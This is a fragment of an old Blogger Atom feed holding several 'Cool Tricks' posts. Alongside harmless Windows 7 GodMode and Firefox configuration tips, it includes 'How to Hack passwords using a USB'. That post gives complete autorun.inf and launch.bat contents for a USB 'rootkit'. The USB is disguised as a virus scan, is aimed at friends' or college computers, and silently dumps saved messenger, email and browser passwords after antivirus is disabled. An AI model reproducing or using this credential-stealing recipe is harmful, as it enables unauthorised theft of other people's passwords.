&lt;a href="http://feedads.g.doubleclick.net/~a/4nfM-YcHLk5vbjMfsvQwFNU8ufA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/4nfM-YcHLk5vbjMfsvQwFNU8ufA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/UBk80eITzeA" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/5559239417655729638/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2010/07/your-first-step-towards-hacking.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/5559239417655729638?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/5559239417655729638?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/UBk80eITzeA/your-first-step-towards-hacking.html" title="Your First Step Towards Hacking" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2010/07/your-first-step-towards-hacking.html</feedburner:origLink></entry><entry gd:etag="W/&quot;D04FR3oycSp7ImA9WxBUFUg.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-9024026576261169382</id><published>2010-03-02T10:51:00.000-08:00</published><updated>2010-03-02T10:51:56.499-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-02T10:51:56.499-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Cool Tricks" /><title>How to Hack passwords using a USB</title><content type="html">Hello Friends, &lt;br /&gt;
&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Have you ever thought that a Simple USB  Drive can be used as a Destructive Tool for Hacking Passwords? Today I  will show you how to hack Passwords using an USB Pen Drive.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;As we all know, Windows stores most of  the passwords which are used on a daily basis, including&amp;nbsp;instant  messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc.  Along with these, Windows also stores passwords of Outlook Express,  SMTP, POP, FTP accounts and auto-complete passwords of many  browsers&amp;nbsp;like IE and Firefox. There exists many tools for recovering  these passswords from their stored places.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Using these tools and an USB pendrive  you can create your own rootkit to hack passwords from your  friend’s/college Computer. We need the following tools to create our  rootkit.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;&lt;a href="http://www.easy-share.com/1903578301/mspass.zip" rel="nofollow" target="_blank" title="Messenger Password 
View"&gt;MessenPass&lt;/a&gt;:  &lt;/strong&gt;Recovers the passwords of most popular Instant Messenger  programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite  4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian,  Miranda, and GAIM.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;&lt;a href="http://www.easy-share.com/1903578300/mailpv.zip" rel="nofollow" target="_blank" title="Mail Password View"&gt;Mail PassView&lt;/a&gt;: &lt;/strong&gt;Recovers the passwords of  the following email programs: Outlook Express, Microsoft Outlook 2000  (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP,  HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla  Thunderbird, Group Mail Free.&lt;br /&gt;
Mail PassView can also recover the passwords of Web-based email accounts  (HotMail, Yahoo!, Gmail), if you use the associated programs of these  accounts.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt; &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;&lt;a href="http://www.easy-share.com/1903578289/iepv.zip" rel="nofollow" target="_blank" title="IE Password View"&gt;IE Passview&lt;/a&gt;: &lt;/strong&gt;IE PassView is a small utility  that reveals the passwords stored by Internet Explorer browser. It  supports the new Internet Explorer 7.0, as well as older versions of  Internet explorer, v4.0 – v6.0&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;&lt;a href="http://www.easy-share.com/1903578307/pspv.zip" rel="nofollow" target="_blank" title="Protected Storage 
PassView"&gt;Protected  Storage PassView&lt;/a&gt;: &lt;/strong&gt;Recovers all passwords stored inside the  Protected Storage, including the AutoComplete passwords of Internet  Explorer, passwords of Password-protected sites, MSN Explorer Passwords,  and more…&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;&lt;a href="http://www.easy-share.com/1903578302/passwordfox.zip" rel="nofollow" target="_blank" title="Password Fox"&gt;PasswordFox&lt;/a&gt;: &lt;/strong&gt;PasswordFox is a small  password recovery tool that allows you to view the user names and  passwords stored by Mozilla Firefox Web browser. By default, PasswordFox  displays the passwords stored in your current profile, but you can  easily select to watch the passwords of any other Firefox profile. For  each password entry, the following information is displayed: Record  Index, Web Site, User Name, Password, User Name Field, Password Field,  and the Signons filename.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Here is a step by step procedure to  create the password hacking toolkit.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;em&gt;&lt;strong&gt;NOTE:&lt;/strong&gt;&lt;/em&gt; You must  temporarily disable your Anti-Virus before following these steps.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;1.&lt;/strong&gt; &lt;strong&gt;Download &lt;/strong&gt;all  the 5 tools, extract them and copy only the &lt;strong&gt;executables(.exe  files)&lt;/strong&gt; into your USB Pendrive.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;ie: Copy the files – &lt;strong&gt;mspass.exe&lt;/strong&gt;,  &lt;strong&gt;mailpv.exe&lt;/strong&gt;, &lt;strong&gt;iepv.exe&lt;/strong&gt;, &lt;strong&gt;pspv.exe&lt;/strong&gt;  and &lt;strong&gt;passwordfox.exe&lt;/strong&gt; into your USB Drive.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;2.&lt;/strong&gt; &lt;strong&gt;Create a  new&amp;nbsp;Notepad&lt;/strong&gt; and write the following text into it&lt;/div&gt;&lt;blockquote style="text-align: justify;"&gt;&lt;span style="color: #333333;"&gt;&lt;em&gt;&lt;strong&gt;[autorun]&lt;br /&gt;
open=launch.bat&lt;br /&gt;
ACTION= Perform a Virus&amp;nbsp;Scan&lt;/strong&gt;&lt;/em&gt;&lt;/span&gt;&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;save&lt;/strong&gt; the&amp;nbsp;Notepad as &lt;strong&gt;autorun.inf&lt;/strong&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Now&lt;strong&gt; copy &lt;/strong&gt;the &lt;strong&gt;autorun.inf  &lt;/strong&gt;file onto your USB pendrive.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;3.&lt;/strong&gt; Create another  Notepad and write the following text onto it.&lt;/div&gt;&lt;blockquote style="text-align: justify;"&gt;&lt;em&gt;&lt;span style="color: #333333;"&gt;&lt;strong&gt;start mspass.exe /stext mspass.txt&lt;/strong&gt;&lt;/span&gt;&lt;/em&gt;&lt;br /&gt;
&lt;em&gt;&lt;span style="color: #333333;"&gt;&lt;strong&gt;start mailpv.exe  /stext mailpv.txt&lt;/strong&gt;&lt;/span&gt;&lt;/em&gt;&lt;br /&gt;
&lt;em&gt;&lt;span style="color: #333333;"&gt;&lt;strong&gt;start iepv.exe  /stext iepv.txt&lt;/strong&gt;&lt;/span&gt;&lt;/em&gt;&lt;br /&gt;
&lt;em&gt;&lt;span style="color: #333333;"&gt;&lt;strong&gt;start pspv.exe  /stext pspv.txt&lt;/strong&gt;&lt;/span&gt;&lt;/em&gt;&lt;br /&gt;
&lt;em&gt;&lt;span style="color: #333333;"&gt;&lt;strong&gt;start  passwordfox.exe /stext passwordfox.txt&lt;/strong&gt;&lt;/span&gt;&lt;/em&gt;&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;save the Notepad as &lt;em&gt;&lt;strong&gt;launch.bat&lt;/strong&gt;&lt;/em&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;Copy &lt;/strong&gt;the&lt;strong&gt;  launch.bat&lt;/strong&gt; file also to your USB drive.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Now your rootkit is ready and you are  all set to hack the passwords. You can use this pendrive on your  friend’s PC&amp;nbsp;&amp;nbsp;or on your college computer. Just follow these steps&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;1. Insert the pendrive and the autorun  window will pop-up. (This is because, we have created an autorun  pendrive).&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;2. In the pop-up window, select the  first option (&lt;span style="color: #333333;"&gt;&lt;em&gt;&lt;strong&gt;Perform a  Virus Scan&lt;/strong&gt;&lt;/em&gt;&lt;/span&gt;).&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;3. Now all the password hacking tools  will silently get executed in the background (This process takes hardly a  few seconds). The passwords get stored in the&lt;strong&gt; .TXT&lt;/strong&gt;  files.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;4. Remove the pendrive and you’ll see  the&amp;nbsp;stored passwords&amp;nbsp;in the &lt;strong&gt;.TXT&lt;/strong&gt; files.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;This hack works on Windows 2000, XP and  Vista.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;Disclaimer:&lt;/strong&gt; I am not  responsible for any kind of Damage caused by using the above  information. The above Tutorial is only for recovering forgotten  passwords.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-9024026576261169382?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/RpIi3G3A5obPCANDCpb9xuOPzK0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/RpIi3G3A5obPCANDCpb9xuOPzK0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/RpIi3G3A5obPCANDCpb9xuOPzK0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/RpIi3G3A5obPCANDCpb9xuOPzK0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/mNLRejNlf3Q" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/9024026576261169382/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2010/03/how-to-hack-passwords-using-usb.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/9024026576261169382?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/9024026576261169382?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/mNLRejNlf3Q/how-to-hack-passwords-using-usb.html" title="How to Hack passwords using a USB" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2010/03/how-to-hack-passwords-using-usb.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEcGRn0zeSp7ImA9WxBUFUg.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-3811109569933360452</id><published>2010-03-02T09:47:00.000-08:00</published><updated>2010-03-02T09:47:07.381-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-02T09:47:07.381-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Cool Tricks" /><title>Secret ‘GodModes’ in Windows 7</title><content type="html">&lt;div style="text-align: justify;"&gt;The foxy-sounding name is a little deceiving, because as far  as we know, it is exactly what people are calling it – a glorified  control panel. &amp;nbsp;However, that goes without saying how useful this  feature actually is.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;GodMode is the name given to cheats in  video games that provided you with all weapons and access to all areas.  As it turns out, Windows 7 has a GodMode cheat as well. It is basically a  control panel of sorts which provides you access to all the features in  one explorer window. In the Windows 7 control panel, features are  grouped together either in categories or control panel item names.  Nothing is grouped under anything in GodMode.&lt;/div&gt;&lt;h3 style="text-align: justify;"&gt;&lt;strong&gt;How to access GodMode?&lt;/strong&gt;&lt;/h3&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;Method 1:&lt;/strong&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;1.&lt;/strong&gt; Create a new folder  and name it &lt;strong&gt;GodMode.{ED7BA470-8E54-465E-825C-99712043E01C} &lt;/strong&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;2.&lt;/strong&gt; The icon will be  changed automatically to Control Panel’s icon.&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;img alt="" class="size-full wp-image-1281    
aligncenter" height="107" src="http://www.hungry-hackers.com/wp-content/uploads/2010/01/gmode.png" title="gmode" width="110" /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;3. Now open the folder and see the magic  of Windows Registry!&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;img alt="" class="size-full wp-image-1282    
aligncenter" height="327" src="http://www.hungry-hackers.com/wp-content/uploads/2010/01/gmode1.jpg" title="gmode1" width="550" /&gt;&lt;/div&gt;&lt;h3 style="text-align: justify;"&gt;Method 2&lt;/h3&gt;&lt;div style="text-align: justify;"&gt;1. Create a shortcut with following path  and set desired icon:&lt;/div&gt;&lt;blockquote style="text-align: justify;"&gt;explorer.exe  shell:::{ED7BA470-8E54-465E-825C-99712043E01C}&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;&lt;span style="color: black;"&gt;&lt;strong&gt;Note: Sometimes it kills  explorer.exe using Method 1! probably Windows Vista x64 editions.  Therefore I suggest to use Method 2.&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;h3 style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;&lt;span style="color: black;"&gt;&lt;strong&gt;Solution for the Crash&lt;br /&gt;
&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="color: red;"&gt;&lt;span style="color: black;"&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/span&gt;To get rid  of this issue, Boot into Safe Mode with Command Prompt and delete that  folder. For eg. You created a folder GodMode&lt;em&gt;.{ED7BA470-8E54-465E-825C-99712043E01C}  &lt;/em&gt;on desktop, So either navigate to Desktop folder execute the  following command:&lt;/div&gt;&lt;blockquote style="text-align: justify;"&gt;RmDir  “GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}”&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;Or type the absolute path of folder,  like-&lt;/div&gt;&lt;blockquote style="text-align: justify;"&gt;RmDir  “C:\Users\&lt;user-name&gt;\Desktop\GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}”&lt;/user-name&gt;&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;Applies To:&lt;/strong&gt;&lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;Windows Vista x86 editions&lt;/li&gt;
&lt;li&gt;Windows Vista x64 editions&lt;/li&gt;
&lt;li&gt;Windows 7 x86 editions&lt;/li&gt;
&lt;li&gt;Windows 7 x64 editions&lt;/li&gt;
&lt;/ul&gt;&lt;h3 style="text-align: justify;"&gt;Windows has lot of GodModes&lt;/h3&gt;&lt;div style="text-align: justify;"&gt;It is found that there are lot of  GodModes and they differ based on the Strings used in Name the Folder.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;In an e-mail interview, Steven Sinofsky,  Windows division president, said several similar undocumented features  provide direct access to all kinds of settings, from choosing a location  to managing power settings to identifying biometric sensors.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;As with the all-encompassing GodMode  uncovered by bloggers, these other settings can be accessed directly by  creating a new folder with any name (GodMode or otherwise) and then  including a certain text string. Sinofsky noted more than a dozen  strings create particular settings folders, in addition to the  overarching GodMode folder option.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;For example, the first one could be a  folder named “Hungry Hacker.{00C6D95F-329C-409a-81D7-C46C66EA7F33}” (use  everything inside quotes–but not the quotes themselves).&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Here’s the list of strings:&lt;/div&gt;&lt;blockquote style="text-align: justify;"&gt;{00C6D95F-329C-409a-81D7-C46C66EA7F33}&lt;br /&gt;
{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}&lt;br /&gt;
{025A5937-A6BE-4686-A844-36FE4BEC8B6D}&lt;br /&gt;
{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}&lt;br /&gt;
{1206F5F1-0569-412C-8FEC-3204630DFB70}&lt;br /&gt;
{15eae92e-f17a-4431-9f28-805e482dafd4}&lt;br /&gt;
{17cd9488-1228-4b2f-88ce-4298e93e0966}&lt;br /&gt;
{1D2680C9-0E2A-469d-B787-065558BC7D43}&lt;br /&gt;
{1FA9085F-25A2-489B-85D4-86326EEDCD87}&lt;br /&gt;
{208D2C60-3AEA-1069-A2D7-08002B30309D}&lt;br /&gt;
{20D04FE0-3AEA-1069-A2D8-08002B30309D}&lt;br /&gt;
{2227A280-3AEA-1069-A2DE-08002B30309D}&lt;br /&gt;
{241D7C96-F8BF-4F85-B01F-E2B043341A4B}&lt;br /&gt;
{4026492F-2F69-46B8-B9BF-5654FC07E423}&lt;br /&gt;
{62D8ED13-C9D0-4CE8-A914-47DD628FB1B0}&lt;br /&gt;
{78F3955E-3B90-4184-BD14-5397C15F1EFC}&lt;/blockquote&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-3811109569933360452?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/ATiEN1ILMmibxMPFQBOrgouopAY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ATiEN1ILMmibxMPFQBOrgouopAY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/ATiEN1ILMmibxMPFQBOrgouopAY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/ATiEN1ILMmibxMPFQBOrgouopAY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/sjTAB0lnRsY" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/3811109569933360452/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2010/03/secret-godmodes-in-windows-7.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/3811109569933360452?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/3811109569933360452?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/sjTAB0lnRsY/secret-godmodes-in-windows-7.html" title="Secret ‘GodModes’ in Windows 7" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2010/03/secret-godmodes-in-windows-7.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0YHRn85eSp7ImA9WxBUFUk.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-7698437676704369482</id><published>2010-03-02T08:58:00.001-08:00</published><updated>2010-03-02T08:58:57.121-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-03-02T08:58:57.121-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Cool Tricks" /><title>8 Hidden Firefox Secrets Revealed</title><content type="html">&lt;div style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: justify;"&gt;&lt;img alt="" class="alignleft size-full wp-image-1190" height="188" src="http://www.hungry-hackers.com/wp-content/uploads/2009/12/firefox_logo.jpg" style="margin-right: 10px;" title="firefox_logo" width="200" /&gt;&lt;/div&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;The best thing about Firefox is  that just when you think you know everything there is to know about the  browser, something new comes along and surprises you. Here are few  hidden tips and tricks. Maybe these are old hat and you know them  already. Or maybe you had no idea these could be done. Lets see how many  of these you know already.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;1. Open docx file using Firefox  without Office 2007: &lt;/strong&gt;Now, you can view docx files using Firefox  by installing &lt;a href="http://www.codeplex.com/Project/Download/FileDownload.aspx?ProjectName=OpenXMLViewer&amp;amp;DownloadId=49856" target="_blank" title="Open XML Viewer"&gt;OpenXMLViewer&lt;/a&gt; which is available for Windows, Mac  and Linux users.&lt;strong&gt; &lt;/strong&gt;It is an useful extension for users  who haven’t upgrade to Microsoft Office 2007. Basically, the extension  will convert docx documents into HTML format so that web browsers can  render and display to users. So, the extension is not able to shows  embedded objects.&lt;strong&gt;&lt;/strong&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;&lt;br /&gt;
&lt;/strong&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;2. More screen space:&lt;/strong&gt;  Make your icons small. Go to View – Toolbars – Customize and check the  “Use small icons” box.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;3. Mouse shortcuts:&lt;/strong&gt; We  all are aware of the Keyboard shortcuts. But have you ever tried Mouse  Shortcuts. Sometimes you are already using your mouse and it is easier  to use a mouse shortcut than to go back to the keyboard. Master these  cool ones&lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;Middle click on link (opens in new tab)&lt;/li&gt;
&lt;li&gt;Shift-scroll down (previous page)&lt;/li&gt;
&lt;li&gt;Shift-scroll up (next page)&lt;/li&gt;
&lt;li&gt;Ctrl-scroll up (decrease text size)&lt;/li&gt;
&lt;li&gt;Ctrl-scroll down (increase text size)&lt;/li&gt;
&lt;li&gt;Middle click on a tab (closes tab)&lt;/li&gt;
&lt;/ul&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;&lt;/strong&gt;&lt;strong&gt;4. Limit RAM  usage&lt;/strong&gt;: If Firefox takes up too much memory on your computer,  you can limit the amount of RAM it is allowed to us. Go to about:config,  filter “browser.cache” and select “browser.cache.disk.capacity”. It’s  set to 50000, but you can lower it, depending on how much memory you  have. Try 15000 if you have between 512MB and 1GB ram.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;&lt;/strong&gt;&lt;strong&gt;5. Reduce RAM  usage further for when Firefox is minimized&lt;/strong&gt;: This setting will  move Firefox to your hard drive when you minimize it, taking up much  less memory. And there is no noticeable difference in speed when you  restore Firefox, so it’s definitely worth a go. Again, go to  about:config, right-click anywhere and select New-&amp;gt; Boolean. Name it  “config.trim_on_minimize” and set it to TRUE. You have to restart  Firefox for these settings to take effect.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;6. Move or remove the close tab  button&lt;/strong&gt;: Do you accidentally click on the close button of  Firefox’s tabs? You can move them or remove them, again through  about:config. Edit the preference for “browser.tabs.closeButtons”. Here  are the meanings of each value:&lt;/div&gt;&lt;blockquote style="text-align: justify;"&gt;0: Display a close button on  the active tab only&lt;br /&gt;
1: (Default) Display close buttons on all tabs&lt;br /&gt;
2: Don’t display any close buttons&lt;br /&gt;
3: Display a single close button at the end of the tab bar (Firefox  1.x behavior)&lt;/blockquote&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;7. Smart keywords: &lt;/strong&gt;Smart  keywords are an easy way to search specific websites directly from the  Firefox Location bar. Instead of going to the targeted website, finding  the search function, and executing the search, you can search the  website using Firefox, while you are at any website.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;For example, suppose you search The  Internet Movie Database (IMDB) on a regular basis. You can define a  smart keyword to enable searching IMDB through your browser. To search  IMDB for information on William Shatner, you would enter the following  in the Firefox Location bar: &lt;strong&gt;imdb William Shatner&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;To create a Smart Keyword you can follow  the steps given in this &lt;a href="http://support.mozilla.com/en-US/kb/Smart+keywords" target="_blank" title="Smart Keywords"&gt;Tutorial&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;strong&gt;8. Firefox Optimizer: &lt;/strong&gt;Firefox  Optimizers for Mozilla Firefox v1.x / 2.x / 3.x was developed for an  easy and fast optimization of your browsing experience with Firefox. It  is based on a collection of popular and well working optimization  settings used and tested by the experts. You can download this software  from &lt;a href="http://www.mediafire.com/?sharekey=10e7d6bcda62666fc79b87b207592a1c5e6aae1cb35381575621d66e282a0ee8" target="_blank" title="Firefox Optimizer"&gt;here&lt;/a&gt;.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-7698437676704369482?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/5jCvfqrhMiI4d2Oa4DqVBSk6NN8/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/5jCvfqrhMiI4d2Oa4DqVBSk6NN8/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/5jCvfqrhMiI4d2Oa4DqVBSk6NN8/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/5jCvfqrhMiI4d2Oa4DqVBSk6NN8/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/vS2eY6zgKHs" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/7698437676704369482/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2010/03/8-hidden-firefox-secrets-revealed.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/7698437676704369482?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/7698437676704369482?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/vS2eY6zgKHs/8-hidden-firefox-secrets-revealed.html" title="8 Hidden Firefox Secrets Revealed" /><author><name>Nelson 